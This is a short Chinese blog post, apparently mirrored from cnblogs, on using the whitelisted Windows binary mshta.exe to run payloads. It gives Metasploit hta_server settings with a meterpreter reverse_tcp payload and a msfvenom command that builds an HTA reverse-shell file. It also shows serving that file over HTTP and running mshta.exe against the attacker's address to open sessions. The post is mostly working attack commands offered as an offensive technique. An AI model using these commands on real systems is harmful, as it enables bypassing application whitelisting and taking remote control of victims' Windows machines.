zoukankan      html  css  js  c++  java
  • 白名单执行payload之mshta

    简介

    运行Microsoft HTML应用程序主机的Mshta.exe,Windows OS实用程序负责运行HTA(HTML应用程序)文件,我们可以运行JavaScript或Visual的HTML文件
    

    实际使用

    hta_server

    msf配置如下
    msf6 > use exploit/windows/misc/hta_server
    [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
    msf6 exploit(windows/misc/hta_server) > set srvhost 192.168.122.1
    srvhost => 192.168.122.1
    

    运行mshta.exe http://192.168.122.1:8080/mVdVMFX2eB94I.hta获得session如下
    

    msfvenom

    生成hta文件并启动web服务
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.122.1 lport=20211 -f hta-psh > 20211.hta
    python -m SimpleHTTPServer 80
    

    设定监听如下
    

    运行后上线如下
    mshta.exe http://192.168.122.1/20211.hta
    

    联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
  • 相关阅读:
    java8 file转base64
    springboot下maven分环境打包
    maven加载src下的xml文件
    ue正则
    springboot 深坑
    解压版mysql 错误-mysql启动失败
    spring整合activeMQ
    maven分环境 打包
    logger日志配置
    hadoop安装
  • 原文地址:https://www.cnblogs.com/Yang34/p/14404214.html
Copyright © 2011-2022 走看看